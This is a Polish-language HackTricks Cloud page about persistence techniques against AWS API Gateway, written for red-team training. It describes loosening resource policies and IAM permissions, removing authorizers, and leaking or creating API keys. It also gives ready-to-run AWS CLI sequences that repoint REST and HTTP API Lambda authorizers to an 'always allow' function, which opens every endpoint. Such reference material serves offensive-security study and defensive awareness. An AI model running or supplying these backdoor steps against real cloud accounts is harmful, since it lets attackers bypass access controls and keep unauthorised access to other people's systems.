AWS - API Gateway Persistence
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
API Gateway
Więcej informacji znajdziesz w:
Resource Policy
Zmień politykę zasobów API Gateway, aby przyznać sobie do nich dostęp
Modyfikacja Lambda Authorizers
Zmodyfikuj kod lambda authorizers, aby przyznać sobie dostęp do wszystkich endpointów.
Lub po prostu usuń użycie authorizera.
Jeśli masz uprawnienia control-plane do utworzenia/aktualizacji authorizera (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) możesz także wskazać authorizera na Lambdę, która zawsze zezwala.
REST APIs (zmiany zazwyczaj wymagają wdrożenia):
REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"
HTTP APIs / apigatewayv2 (często działa natychmiast):
REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
IAM Permissions
Jeśli zasób używa IAM authorizer, możesz nadać sobie dostęp do niego, modyfikując IAM permissions.
Albo po prostu usuń użycie authorizera.
API Keys
Jeśli używane są API keys, możesz je leakować, aby utrzymać persistence lub nawet utworzyć nowe.
Albo po prostu usuń użycie API keys.
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
HackTricks Cloud

